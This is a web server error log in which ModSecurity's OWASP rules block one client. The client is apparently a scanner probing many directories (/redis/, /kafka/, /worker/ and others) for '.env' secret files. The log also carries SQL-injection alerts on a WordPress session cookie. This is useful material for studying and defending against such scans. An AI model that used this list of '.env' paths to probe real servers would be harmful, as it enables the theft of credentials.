[Mon May 11 14:10:36.021953 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHHPOJEyNRN152ArORz2AAAAFI"]
[Mon May 11 14:10:36.022223 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mongodb/.env"] [unique_id "agHHPOJEyNRN152ArORz2AAAAFI"]
[Mon May 11 14:10:36.365026 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHHPOJEyNRN152ArORz2gAAAFI"]
[Mon May 11 14:10:36.365426 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHHPOJEyNRN152ArORz2gAAAFI"]
[Mon May 11 14:10:36.365620 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHHPOJEyNRN152ArORz2gAAAFI"]
[Mon May 11 14:10:36.365882 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/redis/.env"] [unique_id "agHHPOJEyNRN152ArORz2gAAAFI"]
[Mon May 11 14:10:36.644101 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHHPOJEyNRN152ArORz2wAAAFI"]
[Mon May 11 14:10:36.644504 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHHPOJEyNRN152ArORz2wAAAFI"]
[Mon May 11 14:10:36.644689 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHHPOJEyNRN152ArORz2wAAAFI"]
[Mon May 11 14:10:36.644921 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/elasticsearch/.env"] [unique_id "agHHPOJEyNRN152ArORz2wAAAFI"]
[Mon May 11 14:10:36.914506 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHHPOJEyNRN152ArORz3AAAAFI"]
[Mon May 11 14:10:36.914904 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHHPOJEyNRN152ArORz3AAAAFI"]
[Mon May 11 14:10:36.915096 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHHPOJEyNRN152ArORz3AAAAFI"]
[Mon May 11 14:10:36.915356 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/rabbitmq/.env"] [unique_id "agHHPOJEyNRN152ArORz3AAAAFI"]
[Mon May 11 14:10:37.184100 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHHPeJEyNRN152ArORz3QAAAFI"]
[Mon May 11 14:10:37.184479 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHHPeJEyNRN152ArORz3QAAAFI"]
[Mon May 11 14:10:37.184652 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHHPeJEyNRN152ArORz3QAAAFI"]
[Mon May 11 14:10:37.184888 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/kafka/.env"] [unique_id "agHHPeJEyNRN152ArORz3QAAAFI"]
[Mon May 11 14:10:37.464295 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHHPeJEyNRN152ArORz3wAAAFI"]
[Mon May 11 14:10:37.464714 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHHPeJEyNRN152ArORz3wAAAFI"]
[Mon May 11 14:10:37.464921 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHHPeJEyNRN152ArORz3wAAAFI"]
[Mon May 11 14:10:37.465251 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/queue/.env"] [unique_id "agHHPeJEyNRN152ArORz3wAAAFI"]
[Mon May 11 14:10:37.723293 2026] [core:error] [pid 1319886:tid 1319924] [client 52.242.216.199:21712] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:37.723329 2026] [core:error] [pid 1319886:tid 1319924] [client 52.242.216.199:21712] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:37.734810 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHHPeJEyNRN152ArORz4AAAAFI"]
[Mon May 11 14:10:37.735248 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHHPeJEyNRN152ArORz4AAAAFI"]
[Mon May 11 14:10:37.735437 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHHPeJEyNRN152ArORz4AAAAFI"]
[Mon May 11 14:10:37.735678 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/worker/.env"] [unique_id "agHHPeJEyNRN152ArORz4AAAAFI"]
[Mon May 11 14:10:38.677136 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBSwAAABU"]
[Mon May 11 14:10:38.677969 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBSwAAABU"]
[Mon May 11 14:10:38.678150 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBSwAAABU"]
[Mon May 11 14:10:38.678963 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/job/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBSwAAABU"]
[Mon May 11 14:10:38.861312 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBTAAAABU"]
[Mon May 11 14:10:38.861688 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBTAAAABU"]
[Mon May 11 14:10:38.861876 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBTAAAABU"]
[Mon May 11 14:10:38.862106 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/test/.env"] [unique_id "agHHPqy-5-wpj6Sx56aBTAAAABU"]
[Mon May 11 14:10:39.045570 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTQAAABU"]
